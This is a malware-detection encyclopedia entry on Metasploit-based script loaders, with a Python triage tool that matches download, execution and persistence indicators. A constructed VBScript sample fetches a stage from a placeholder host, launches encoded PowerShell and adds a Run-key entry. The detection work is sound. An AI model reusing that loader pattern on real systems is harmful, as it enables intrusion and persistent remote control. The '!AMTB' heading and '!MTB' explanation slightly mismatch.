Trojan:Script/Metasploit!MSR
Trojan:Script/Metasploit!MSR represents a critical detection for weaponized scripts, crafted in JavaScript or VBScript, that function as the initial loader in a multi-stage attack chain leveraging the Metasploit Framework. This malicious script serves as a delivery mechanism, often distributed through phishing emails with deceptive attachments or by exploiting vulnerabilities in unpatched software. Upon launch, its primary function is to retrieve and deploy a memory-resident Meterpreter payload from a remote server under the threat actor’s control.
This payload then establishes a reverse TCP, HTTP, or HTTPS connection to a designated command-and-control (C2) server, creating a covert channel for remote administration. The connection gives the threat actor comprehensive system-level command access, enabling activities ranging from credential harvesting and keystroke logging to file exfiltration and the deployment of secondary payloads such as ransomware.
Operating in memory (fileless), the payload injects itself into legitimate system processes to evade traditional file-based detection. The initial script attempts to establish persistence through Windows Registry modifications or scheduled tasks to ensure survival after a system reboot.
Trojan:Script/Metasploit!AMTB
Trojan:Script/Metasploit!AMTB covers the same class of JavaScript and VBScript loader scripts described under Trojan:Script/Metasploit!MSR above: a script delivered by phishing attachment or through an unpatched-software exploit that retrieves a memory-resident Meterpreter payload from an attacker-controlled server. That payload opens a reverse TCP, HTTP, or HTTPS channel to a C2 server for full remote control (credential harvesting, keystroke logging, file exfiltration, secondary payloads such as ransomware), injects into legitimate processes to evade file-based detection, and the initial script attempts persistence through Windows Registry modifications or scheduled tasks so it survives a reboot.
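To make the behaviours in both entries concrete from the detection side, here is an added Python example (not from this page and not any vendor's engine) that triages a script sample on the three traits the entries describe: remote payload retrieval, execution through a script host, and Run-key or scheduled-task persistence. The indicator patterns, the `triage` function, the `Verdict` class and both sample scripts are constructed for illustration; the loader-shaped sample uses an `.invalid` placeholder host and an undefined payload variable, so it does nothing on its own.

```python
"""Heuristic triage for script-based loaders (constructed example).

A sample is flagged as loader-like when it both fetches remote content and
executes through a script host; persistence indicators raise the score.
"""
import re
from dataclasses import dataclass, field

# Constructed indicator lists. Real behavioural detections use far richer
# signals (emulation, API traces), but the categories mirror the page.
INDICATORS = {
    "download": [
        r"MSXML2\.(?:Server)?XMLHTTP",
        r"WinHttp\.WinHttpRequest",
        r"ADODB\.Stream",
        r"\bDownloadString\b|\bDownloadFile\b",
    ],
    "execute": [
        r"WScript\.Shell",
        r"Shell\.Application",
        r"\.(?:Run|Exec)\b",
        r"\bpowershell(?:\.exe)?\b.*?(?:-EncodedCommand|-enc|-e\b)",
    ],
    "persist": [
        r"CurrentVersion\\Run",
        r"\bschtasks(?:\.exe)?\b.*?/create",
        r"\bRegWrite\b",
    ],
}


@dataclass
class Verdict:
    categories: dict = field(default_factory=dict)  # category -> matched patterns
    score: int = 0                                  # total indicator hits
    suspicious: bool = False                        # download AND execute present


def deobfuscate_concat(text: str) -> str:
    """Collapse simple string splitting such as "MSX" & "ML2" or "MSX" + "ML2"."""
    return re.sub(r'"\s*[&+]\s*"', "", text)


def triage(script_text: str) -> Verdict:
    text = deobfuscate_concat(script_text)
    verdict = Verdict()
    for category, patterns in INDICATORS.items():
        hits = [p for p in patterns if re.search(p, text, re.IGNORECASE)]
        if hits:
            verdict.categories[category] = hits
            verdict.score += len(hits)
    # A loader needs both a fetch and an execution primitive; persistence alone
    # is common in legitimate admin scripts and only adds weight.
    verdict.suspicious = {"download", "execute"} <= verdict.categories.keys()
    return verdict


# Constructed samples. The loader-shaped one is deliberately non-functional:
# placeholder host, undefined Payload variable, no real payload.
SAMPLE_LOADER = r'''Set h = CreateObject("MSX" & "ML2.XMLHTTP")
h.Open "GET", "http://c2-placeholder.invalid/stage", False
h.Send
Set s = CreateObject("WScript.Shell")
s.Run "powershell.exe -EncodedCommand " & Payload, 0
s.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", WScript.ScriptFullName
'''

SAMPLE_BENIGN = r'''Set s = CreateObject("WScript.Shell")
v = s.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName")
WScript.Echo "Running on " & v
'''

if __name__ == "__main__":
    for name, sample in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        v = triage(sample)
        print(f"{name}: suspicious={v.suspicious} score={v.score} "
              f"categories={sorted(v.categories)}")
```

The split-string collapse is the one piece of normalisation included because string concatenation is the cheapest way to defeat naive pattern matching; a production triage stage would also decode Base64 and `Chr()` sequences before matching, which is exactly why the entries note that behavioural monitoring, not static strings, drives the detection.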
The "!MTB" suffix denotes Machine Threat Behavior, signifying that the threat was flagged through behavioral monitoring or machine learning techniques. Rather than relying on traditional static indicators such as file hashes, the antivirus identifies operational sequences, behavioral traits, or code characteristics aligned with the broader "Metasploit" category.